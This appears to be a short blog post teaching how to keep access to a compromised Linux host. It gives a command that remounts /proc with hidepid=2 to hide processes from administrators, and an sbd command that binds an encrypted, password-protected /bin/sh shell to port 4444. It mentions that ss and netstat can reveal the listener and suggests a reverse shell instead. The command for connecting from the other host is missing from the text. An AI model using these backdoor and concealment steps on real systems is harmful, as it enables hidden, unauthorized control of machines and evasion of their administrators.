sbd is a program similar to netcat that allows one to read and write to TCP sockets. sbd is fully portable and is available Windows and Unix/Linux operating systems.
In this post I will show how after one gains privileged access to a system they can maintain access using sbd. I will also illustrate some of the pitfalls of using tools like sbd.
After compromising an account that has sudo rights remount the proc file system as follows :
mount -o remount,rw,hidepid=2 /proc
This command will remount the proc file system and preclude users from accessing /proc and /proc/PID. This will hide all processes from users except ones they own. A unobservant administrator may not notice this at first when logging in under their own account.
Note that this option is only available under Linux kernels 3.2+. Also, root will still be able to see all processes.
Next run sbd. An example of possible options are:
sbd – l-c on -k password -vv -n -e /bin/sh -p 4444
-c on : encryption on
-k password : enable password authentication where password is the password
-vv : verbose
-n : disable name resolution
-e : execute program on connection
-p port : listen on port
-l : listen for connections
As the following examples show, the process is hidden from the non-privileged user, but the ss command still shows the host is listening on port 4444.
From the other host you can initiate the connection as follows :
This method of maintaining access is simple but not very robust as sbd can still be discovered via the netstat and ss commands. Also, note that a bind shell was used in this example, so the port used must be opened on any firewalls. A reverse shell would be better suited for this case.